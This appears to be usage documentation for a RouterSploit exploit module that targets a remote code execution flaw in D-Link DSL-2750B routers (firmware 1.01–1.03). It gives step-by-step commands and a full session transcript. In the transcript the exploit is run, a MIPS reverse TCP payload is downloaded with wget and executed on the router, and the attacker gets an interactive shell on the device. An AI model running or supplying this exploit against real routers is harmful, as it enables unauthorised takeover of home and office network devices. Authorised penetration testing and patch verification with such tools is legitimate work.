
## Description

This module exploits a remote code execution vulnerability in D-Link DSL-2750B devices through the `cli` parameter. Firmware versions 1.01 through 1.03 are vulnerable.

## Verification Steps

1. Start `./rsf.py`
2. Do: `use exploits/routers/dlink/dsl_2750b_rce`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If the router is vulnerable, it should be possible to execute commands at the operating-system level.
6. Do: `set payload reverse_tcp`
7. Do: `set lhost [AttackerIP]`
8. Do: `run`
9. The payload is sent to the device and executed, providing the attacker with a command shell.

## Scenarios

```
rsf > use exploits/routers/dlink/dsl_2750b_rce
rsf (D-Link DSL-2750B RCE) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (D-Link DSL-2750B RCE) > run
[*] Running module...
[+] Target appears to be vulnerable

[+] Welcome to cmd. Commands are sent to the target via the execute method.
[*] For further exploitation use 'show payloads' and 'set payload <payload>' commands.

cmd > show payloads
[*] Available payloads:

   Payload         Name                   Description
   -------         ----                   -----------
   bind_tcp        MIPSBE Bind TCP        Creates interactive tcp bind shell for MIPSBE architecture.
   reverse_tcp     MIPSBE Reverse TCP     Creates interactive tcp reverse shell for MIPSBE architecture.

cmd > set payload reverse_tcp
cmd (MIPSBE Reverse TCP) > show options

Payload Options:

   Name      Current settings     Description
   ----      ----------------     -----------
   lhost                          Connect-back IP address
   lport     5555                 Connect-back TCP Port


cmd (MIPSBE Reverse TCP) > set lhost 192.168.1.4
lhost => 192.168.1.4
cmd (MIPSBE Reverse TCP) > run
[*] Using wget method
[*] Using wget to download binary
[*] Executing payload on the device
[*] Waiting for reverse shell...
[*] Connection from 192.168.1.1:41933
[+] Enjoy your shell
ls -la
drwxrwxrwx   15 admin    root           224 Mar 11  2013 .
drwxrwxrwx   15 admin    root           224 Mar 11  2013 ..
drwxr-xr-x    2 admin    root          2554 Mar 11  2013 bin
drwxr-xr-x    2 admin    root             3 Mar 11  2013 data
drwxr-xr-x    4 admin    root          2482 Mar 11  2013 dev
drwxr-xr-x   12 admin    root           779 Mar 11  2013 etc
drwxr-xr-x    6 admin    root           690 Mar 11  2013 lib
lrwxrwxrwx    1 admin    root            11 Mar 11  2013 linuxrc -> bin/busybox
drwxr-xr-x    2 admin    root             0 Jan  1  1970 mnt
drwxr-xr-x    5 admin    root            56 Mar 11  2013 opt
dr-xr-xr-x   69 admin    root             0 Jan  1  1970 proc
drwxr-xr-x    2 admin    root           270 Mar 11  2013 sbin
drwxr-xr-x   11 admin    root             0 Jan  1  1970 sys
lrwxrwxrwx    1 admin    root             8 Mar 11  2013 tmp -> /var/tmp
drwxr-xr-x    4 admin    root            38 Mar 11  2013 usr
drwxr-xr-x   16 admin    root             0 Oct 19 20:36 var
drwxr-xr-x    5 admin    root          2801 Mar 11  2013 webs
```